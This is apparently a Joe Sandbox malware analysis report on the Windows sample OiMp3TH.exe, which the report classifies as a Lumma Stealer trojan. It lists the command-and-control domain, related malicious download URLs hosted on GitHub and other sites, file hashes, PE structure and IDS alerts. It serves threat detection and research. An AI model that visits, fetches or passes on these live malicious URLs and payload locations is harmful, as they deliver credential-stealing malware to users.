                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://hummskitnj.buzz/RXghhqoznpon_638708802577261661.exe, 00000007.00000003.2238402687.000000000394F000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238058591.000000000394C000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262784662.000000000394E000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262559814.000000000394E000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238144082.000000000394C000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238704688.000000000394F000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239884596.000000000394F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.199.108.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
172.67.216.236 | hummskitnj.buzz | United States | 13335 | CLOUDFLARENETUS | true
20.233.83.145 | github.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581343
Start date and time: 2024-12-27 13:10:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 40s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: OiMp3TH.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@9/10@3/3
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 38
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target OiMp3TH.exe, PID 4744 because it is empty
• Execution Graph export aborted for target ghhqoznpon_638708802577261661.exe, PID 6396 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
07:10:53 | API Interceptor | 25x Sleep call for process: powershell.exe modified
07:11:00 | API Interceptor | 9171843x Sleep call for process: OiMp3TH.exe modified
07:11:07 | API Interceptor | 8x Sleep call for process: ghhqoznpon_638708802577261661.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.199.108.133 | cr_asm.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.108.133 | vF20HtY4a4.exe | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.108.133 | VvPrGsGGWH.exe | malicious | AsyncRAT, XWorm | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.108.133 | OSLdZanXNc.exe | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.108.133 | gaber.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.108.133 | cr_asm.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
172.67.216.236 | nE0BePfCtd.exe | malicious | Unknown | swretjhwrtj.gq/autorun.exe
172.67.216.236 | bPNK0VeG79.exe | malicious | Unknown | swretjhwrtj.gq/Buld2.exe
172.67.216.236 | t7p1ekMto0.exe | malicious | Ades Stealer Raccoon RedLine SmokeLoader Tofsee Vidar | swretjhwrtj.gq/GPU.exe
172.67.216.236 | GzsKHwvBmG.exe | malicious | Raccoon SmokeLoader Tofsee Vidar | swretjhwrtj.gq/@Rarenut0.exe
172.67.216.236 | 69CDTt1pad.exe | malicious | Raccoon RedLine SmokeLoader Tofsee Vidar | swretjhwrtj.gq/@Rarenut0.exe
20.233.83.145 | Y5kEUsYDFr.exe | malicious | Unknown | github.com/keygroup777-Ransomware/DOWNLOADER/raw/refs/heads/main/telefron.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
github.com | YYjRtxS70h.exe | malicious | Unknown | 20.233.83.145
github.com | YYjRtxS70h.exe | malicious | Unknown | 20.233.83.145
github.com | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 20.233.83.145
github.com | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 20.233.83.145
github.com | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 20.233.83.145
github.com | ORDER-241221K6890PF57682456POC7893789097393.j.jar | malicious | Caesium Obfuscator, STRRAT | 20.233.83.145
github.com | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 20.233.83.145
github.com | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 20.233.83.145
github.com | 58VSNPxrI4.exe | malicious | Unknown | 20.233.83.145
github.com | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 20.233.83.145
raw.githubusercontent.com | 8lOT1rXZp5.exe | malicious | RedLine | 185.199.111.133
raw.githubusercontent.com | Purchase Order No. G02873362-Docx.vbs | malicious | LodaRAT, XRed | 185.199.108.133
raw.githubusercontent.com | YYjRtxS70h.exe | malicious | Unknown | 185.199.109.133
raw.githubusercontent.com | YYjRtxS70h.exe | malicious | Unknown | 185.199.110.133
raw.githubusercontent.com | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 185.199.110.133
raw.githubusercontent.com | Navan - Itinerary.pdf.scr.exe | malicious | LummaC | 185.199.110.133
raw.githubusercontent.com | BigProject.exe | malicious | LummaC | 185.199.110.133
raw.githubusercontent.com | Set-up!.exe | malicious | LummaC | 185.199.108.133
raw.githubusercontent.com | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 185.199.108.133
raw.githubusercontent.com | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 185.199.111.133
Match | Associated Sample Name / URL | Detection | Threat Name | Context (IPs listed under each row)

Match: CLOUDFLARENETUS
  https://dnsextension.pro/invoice/d2d0bf8701b34bc296ca83b956c10720 | malicious | Unknown
    • 104.21.31.138
  k0ukcEH.exe | malicious | LummaC
    • 172.67.157.254
  appFile.exe | malicious | LummaC Stealer
    • 104.21.94.92
  FloydMounts.exe | malicious | LummaC Stealer
    • 104.21.25.41
  5uVReRlvME.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc
    • 172.67.165.185
  0A7XTINw3R.exe | malicious | Unknown
    • 104.26.8.44
  RDb082EApV.exe | malicious | LummaC
    • 104.21.11.101
  GnHq2ZaBUl.exe | malicious | LummaC
    • 104.21.11.101
  vVJvxAfBDM.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc
    • 104.21.11.101
  LIWYEYWSOj.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc
    • 172.67.165.185

Match: MICROSOFT-CORP-MSN-AS-BLOCKUS
  5uVReRlvME.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc
    • 20.233.83.145
  DRWgoZo325.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar
    • 20.189.173.22
  aD7D9fkpII.exe | malicious | Vidar
    • 204.79.197.219
  installer.bat | malicious | Vidar
    • 20.42.73.30
  din.exe | malicious | Vidar
    • 51.104.15.253
  lem.exe | malicious | Vidar
    • 204.79.197.219
  phish_alert_iocp_v1.4.48 - 2024-12-26T095152.060.eml | malicious | Unknown
    • 52.109.68.129
  phish_alert_iocp_v1.4.48 - 2024-12-26T092852.527.eml | malicious | Unknown
    • 20.42.73.24
  HVlonDQpuI.exe | malicious | Vidar
    • 204.79.197.219
  Google Authenticator You're trying to sign in from a new location.msg | malicious | Unknown
    • 52.109.28.46

Match: FASTLYUS
  https://dnsextension.pro/invoice/d2d0bf8701b34bc296ca83b956c10720 | malicious | Unknown
    • 151.101.129.229
  grand-theft-auto-5-theme-1-installer_qb8W-j1.exe | malicious | Unknown
    • 151.101.2.133
  5uVReRlvME.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc
    • 185.199.110.133
  DRWgoZo325.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar
    • 185.199.111.133
  8lOT1rXZp5.exe | malicious | RedLine
    • 185.199.111.133
  phish_alert_iocp_v1.4.48 - 2024-12-26T092852.527.eml | malicious | Unknown
    • 151.101.194.137
  https://contractnerds.com/ | malicious | Unknown
    • 151.101.193.21
  ReJIL-_Document_No._2500015903.msg | malicious | Unknown
    • 151.101.193.91
  http://booking.extranetguests.com/ | malicious | CAPTCHA Scam ClickFix
    • 151.101.194.137
  Google Authenticator You're trying to sign in from a new location.msg | malicious | Unknown
    • 151.101.192.217
Match | Associated Sample Name / URL | Detection | Threat Name | Context (IPs listed under each row)

Match: 3b5074b1b5d032e5620f69f9f700ff0e
  n5Szx8qsFB.lnk | malicious | Unknown
    • 185.199.108.133
    • 20.233.83.145
  A4FY1OA97K.lnk | malicious | DanaBot
    • 185.199.108.133
    • 20.233.83.145
  vreFmptfUu.lnk | malicious | DanaBot
    • 185.199.108.133
    • 20.233.83.145
  skript.bat | malicious | Vidar
    • 185.199.108.133
    • 20.233.83.145
  msgde.exe | malicious | Quasar
    • 185.199.108.133
    • 20.233.83.145
  6ee7HCp9cD.exe | malicious | Quasar
    • 185.199.108.133
    • 20.233.83.145
  https://www.gglusa.us/ | malicious | Unknown
    • 185.199.108.133
    • 20.233.83.145
  ERTL09tA59.exe | malicious | LummaC
    • 185.199.108.133
    • 20.233.83.145
  GtEVo1eO2p.exe | malicious | LummaC
    • 185.199.108.133
    • 20.233.83.145

Match: a0e9f5d64349fb13191bc781f81f42e1
  k0ukcEH.exe | malicious | LummaC
    • 172.67.216.236
  https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102 | malicious | Unknown
    • 172.67.216.236
  appFile.exe | malicious | LummaC Stealer
    • 172.67.216.236
  FloydMounts.exe | malicious | LummaC Stealer
    • 172.67.216.236
  RDb082EApV.exe | malicious | LummaC
    • 172.67.216.236
  GnHq2ZaBUl.exe | malicious | LummaC
    • 172.67.216.236
  vVJvxAfBDM.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc
    • 172.67.216.236
  LIWYEYWSOj.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc
    • 172.67.216.236
  onaUtwpiyq.exe | malicious | LummaC
    • 172.67.216.236
  CAo57G5Cio.exe | malicious | LummaC
    • 172.67.216.236
                                                                                                        No context
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 2232
Entropy (8bit): 5.38001807625381
Encrypted: false
SSDEEP: 48:jWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugePu/ZPUyus:jLHyIFKL3IZ2KRH9OugYs
MD5: EEE631A8D9446D79E1E9EA5F0D4D3C09
SHA1: CE023643DAC11517F0D483E09BC53DF64B828E8E
SHA-256: 250FA2A4F0B4D970DDE35C2312825B63E0036AAE9F3119C0ACFC8BF47A0AE7E3
SHA-512: 95668547D554B120C853BC718251FAE241AF8DC5EED4762A54261DB324941BF53AEF2B70B72D5BE1011F212FCB1561F249FA9A8998254BE2354030D8F33D76C6
Malicious: false
Reputation: low
                                                                                                        Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Reputation:high, very likely benign file
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Reputation:high, very likely benign file
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Users\user\Desktop\OiMp3TH.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1282560
Entropy (8bit): 7.991635882513212
Encrypted: true
SSDEEP: 24576:wDbwKqRFojedLVqKKRUSTL7b8OZJhh4va9Sexo+/eyha7twooF7cpvgzMca/i60:wDkOjGZqK9SfXBZMQSe/ecEloJcpGMcJ
MD5: 2A64267B616C528EE9618165671CCA9A
SHA1: 26750A26D5FFEF41C83B277CDD90710B21F25837
SHA-256: A44491EBA8F23F6C39F017B1C05BAEDF10ACB595D38F303397DAA8F0AA0FF27E
SHA-512: E8C0B1985E17CFC69D7B56A1F8995BAB24E991DC9A4FB7C8B83069FFAD44F1A98B752122D67ADC60A3EED2F727A65A06168867ACD85579F25CF2F111E8BC5BA3
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..........................................@...........................;...........@................................. `-..............................`-.........................................................................................................................@............0... ......."..............@................P...4...0..............@............@...0...$...d..............@.............'..p......................@....data....P...`-..P...B..............@...........................................................................................................................................................................................................................................................................................................................................................................................................
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.5870805902344856
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: OiMp3TH.exe
File size: 94'720 bytes
MD5: ab408f4eb577eda6d98941ede1b44863
SHA1: 95035cc5625641877753b56595972972732a7163
SHA256: a3489b28d0560fdb0bb7ab3191ee01e051f96bb4ebb0d979cea7976ebab5139f
SHA512: 5df00b30171250889468c19c6dff821fa4e776835d655b782f6411197d516cebed593f2ff03e3739cde3355bf3758ea26c683f7092a53975ad6686f65a563179
SSDEEP: 1536:bXbvRCqBSR3iW5hhtTqHmEpHP8Q1a37KNeIdJj6vbXee4BTBGAQ3wz14XPoBrR:bXbvRCqBShiWPn2GwkR7QxdJjybXe9px
TLSH: 9593CF9D17E88334F1FFAB3469BA42404BB2BD97E976BB0C194524A42D33780C529F75
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...9=6..........."...0..T...........r... ........@.. ....................................`................................
Icon Hash: 136cb2b27171b24d
Entrypoint: 0x40721a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x8D363D39 [Fri Jan 27 15:01:13 2045 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x71c8 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8000 | 0x11914 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1a000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x7138 | 0x38 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x5220 | 0x5400 | 0d934b75c3cf07bd796890a2e215ac1c | False | 0.42429315476190477 | data | 5.3517639849837835 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x8000 | 0x11914 | 0x11a00 | c0ba5a2b4cffefab68b1ff537ff76c6c | False | 0.9767564273049646 | data | 7.951237396001796 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1a000 | 0xc | 0x200 | 086a33fc17e8bb0a98221be0ad3fd867 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x81e0 | 0xd5e7 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 1.0004748077941525
RT_ICON | 0x157d8 | 0x1363 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | | | 1.0022164013701391
RT_ICON | 0x16b4c | 0xc9d | PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced | | | 1.0034066274388356
RT_ICON | 0x177fc | 0x9da | PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced | | | 1.0043616177636796
RT_ICON | 0x181e8 | 0x691 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.006543723973825
RT_ICON | 0x1888c | 0x490 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.009417808219178
RT_ICON | 0x18d2c | 0x396 | PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced | | | 1.0119825708061003
RT_ICON | 0x190d4 | 0x299 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0165413533834586
RT_GROUP_ICON | 0x19380 | 0x76 | data | | | 0.7542372881355932
RT_VERSION | 0x19408 | 0x30c | data | | | 0.4217948717948718
RT_MANIFEST | 0x19724 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-27T13:11:07.221826+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49706 | 172.67.216.236 | 443 | TCP
2024-12-27T13:11:08.213577+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49706 | 172.67.216.236 | 443 | TCP
2024-12-27T13:11:08.213577+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49706 | 172.67.216.236 | 443 | TCP
2024-12-27T13:11:09.447823+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49707 | 172.67.216.236 | 443 | TCP
2024-12-27T13:11:10.224644+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49707 | 172.67.216.236 | 443 | TCP
2024-12-27T13:11:10.224644+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49707 | 172.67.216.236 | 443 | TCP
2024-12-27T13:11:12.014251+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49708 | 172.67.216.236 | 443 | TCP
